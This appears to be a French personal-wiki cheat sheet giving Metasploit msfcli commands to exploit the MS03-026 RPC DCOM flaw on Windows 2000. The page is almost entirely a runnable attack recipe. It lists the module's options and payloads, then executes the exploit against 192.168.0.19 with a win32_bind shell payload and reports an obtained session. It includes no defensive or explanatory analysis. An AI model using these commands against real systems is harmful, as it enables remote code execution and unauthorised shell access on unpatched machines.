Windows 2000 vuln

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Vulnérabilité RPC DCOM (MS03-026)
Module exploit/windows/dcerpc/ms03_026_dcom
Interface msfcli (historique)
Voir aussi Windows-seven-attack · Registre

Exploitation de la faille RPC DCOM (MS03-026) sous Windows 2000, via l'interface historique msfcli. Le dernier caractère indique le mode : O (options), P (payloads), T (targets), E (execute).

Étapes

# rechercher le module
msfcli | grep 026

# options
msfcli exploit/windows/dcerpc/ms03_026_dcom O

# payloads
msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=192.168.0.19 P

# compatibilité systèmes
msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=192.168.0.19 PAYLOAD=win32_bind T

# exécuter
msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=192.168.0.19 PAYLOAD=win32_bind E

Session obtenue :

id

Voir aussi